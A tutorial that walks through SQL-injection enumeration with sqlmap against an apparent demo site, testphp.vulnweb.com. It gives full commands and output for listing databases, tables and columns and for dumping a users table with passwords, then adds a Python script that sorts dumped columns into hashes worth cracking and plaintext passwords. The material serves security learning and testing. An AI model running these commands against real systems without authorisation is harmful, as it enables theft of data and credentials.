Database enumeration with sqlmap
We now look at a few enumeration techniques for extracting useful information from the back-end database.
To learn more about the back-end DBMS and web server the application talks to, use the options:
- --banner
- --fingerprint
Likewise, to list the DBMS users and their password hashes:
- --users
- --passwords
To check whether the DBMS user the application connects with is a database administrator (DBA):
- --is-dba
NOTE - not all of this information is always accessible: --users and --passwords, for instance, read privileged system tables (mysql.user on MySQL), so they only work when the injected query runs with sufficient rights. We now extract the contents of the database step by step. Start with the "--dbs" option to list the available databases:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
...
[12:47:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:47:32] [INFO] fetching database names
[12:47:32] [INFO] the SQL query used returns 3 entries
[12:47:33] [INFO] retrieved: information_schema
[12:47:33] [INFO] retrieved: acuart
[12:47:33] [INFO] retrieved: modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:47:33
To enumerate the tables of the "acuart" database, add the options "-D acuart --tables" to the previous command:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...]
[12:48:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:48:46] [INFO] fetching tables for database 'acuart'
[12:48:46] [INFO] the SQL query used returns 7 entries
[12:48:46] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: artists
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: carts
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: categ
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: featured
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: guestbook
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: pictures
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+

[12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:48:48
Now the columns of a table can be listed with "-T <table> --columns":
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...]
[12:49:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:49:27] [INFO] fetching columns for table 'users' on database 'acuart'
[12:49:27] [INFO] the SQL query used returns 8 entries
[12:49:28] [INFO] retrieved: uname
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: pass
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: cc
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: address
[12:49:29] [INFO] retrieved: mediumtext
[12:49:29] [INFO] retrieved: email
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:29] [INFO] retrieved: name
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:29] [INFO] retrieved: phone
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:30] [INFO] retrieved: cart
[12:49:30] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:49:30
Finally, we retrieve the contents of the table, restricting the dump to a range of rows with "--dump --start 1 --stop 5" (rows are numbered from 1; the users table turns out to hold only two rows, so both are returned). When sqlmap sees values that look like password hashes it offers to run a dictionary attack on them; here we decline:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...]
[12:59:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:59:19] [INFO] fetching columns for table 'users' on database 'acuart'
[12:59:19] [INFO] the SQL query used returns 8 entries
[12:59:20] [INFO] retrieved: uname
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: pass
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: cc
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: address
[12:59:21] [INFO] retrieved: mediumtext
[12:59:21] [INFO] retrieved: email
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:21] [INFO] retrieved: name
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:21] [INFO] retrieved: phone
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:22] [INFO] retrieved: cart
[12:59:22] [INFO] retrieved: varchar(100)
[12:59:22] [INFO] fetching entries for table 'users' on database 'acuart'
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: hacked by cacucko!
[12:59:23] [INFO] retrieved: Russian hackers!
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa
[12:59:24] [INFO] retrieved: test
[12:59:24] [INFO] retrieved: gopala
[12:59:24] [INFO] retrieved: gopala
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: acuart
Table: users
[2 entries]
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+
| address            | cart                             | cc      | email            | name    | pass   | phone   | uname  |
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+
| hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala |
| gopala             | 1b90caf669e05660efdf1d23b48100fa | gopala  | gopala           | gopala  | gopala | gopala  | test   |
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+

[12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:59:30
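Note what triggered the "recognized possible password hash values" prompt above: it was the 32-hex-digit value in the cart column, not the pass column, which holds the password in clear. The script below is an added example, not part of the original page or of sqlmap itself: it triages the CSV that sqlmap writes under dump/<db>/<table>.csv, applying the same kind of length-and-charset heuristics sqlmap uses, and reports which columns are worth passing to a cracker and which credential columns are stored in plaintext. The CSV content is constructed here from the dump shown above; the hash patterns (MD5, SHA-1, SHA-256, MySQL old/new, md5crypt, bcrypt) are my own selection and can be extended.

```python
"""Triage a sqlmap table dump: which columns hold hashes, which hold plaintext."""
import csv
import io
import re

# Constructed sample, modelled on the acuart.users dump above. sqlmap writes
# the real file as .../dump/acuart/users.csv with the same header row.
SAMPLE_CSV = """address,cart,cc,email,name,pass,phone,uname
hacked by cacucko!,1b90caf669e05660efdf1d23b48100fa,cacucko,Russian hackers!,cacucko,gopala,cacucko,gopala
gopala,1b90caf669e05660efdf1d23b48100fa,gopala,gopala,gopala,gopala,gopala,test
"""

# Length/charset heuristics of the kind sqlmap applies before asking
# "do you want to use dictionary attack on retrieved table items?".
# Order matters: a MySQL 4.1+ hash is '*' + 40 hex and must win over sha1.
HASH_PATTERNS = [
    ("mysql41", re.compile(r"^\*[0-9A-Fa-f]{40}$")),
    ("mysql_old", re.compile(r"^[0-9A-Fa-f]{16}$")),
    ("md5", re.compile(r"^[0-9A-Fa-f]{32}$")),
    ("sha1", re.compile(r"^[0-9A-Fa-f]{40}$")),
    ("sha256", re.compile(r"^[0-9A-Fa-f]{64}$")),
    ("md5crypt", re.compile(r"^\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$")),
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$")),
]


def classify_value(value):
    """Return a hash-type label for value, or None if it looks like plaintext."""
    value = value.strip()
    for label, pattern in HASH_PATTERNS:
        if pattern.match(value):
            return label
    return None


def triage_dump(csv_text):
    """Map each column to the set of hash types seen in it (empty set = no hashes)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    found = {name: set() for name in reader.fieldnames}
    for row in reader:
        for column, value in row.items():
            label = classify_value(value or "")
            if label:
                found[column].add(label)
    return found


def columns_to_crack(csv_text):
    """Columns that contain at least one hash-like value, sorted for stable output."""
    return sorted(col for col, types in triage_dump(csv_text).items() if types)


def plaintext_credential_columns(csv_text, names=("pass", "password", "passwd", "pwd")):
    """Credential-looking columns that hold no hash at all, i.e. stored in clear."""
    triaged = triage_dump(csv_text)
    return sorted(col for col in triaged if col.lower() in names and not triaged[col])


if __name__ == "__main__":
    for column, types in triage_dump(SAMPLE_CSV).items():
        print(f"{column:8} {sorted(types) or 'plaintext'}")
    print("worth cracking:", columns_to_crack(SAMPLE_CSV))   # ['cart']
    print("stored in clear:", plaintext_credential_columns(SAMPLE_CSV))  # ['pass']
```

On the dump above this reports cart as the only hash-bearing column (MD5-shaped) and flags pass as a credential column stored in clear, which is the more serious finding for the report: there is nothing to crack, the passwords are already readable.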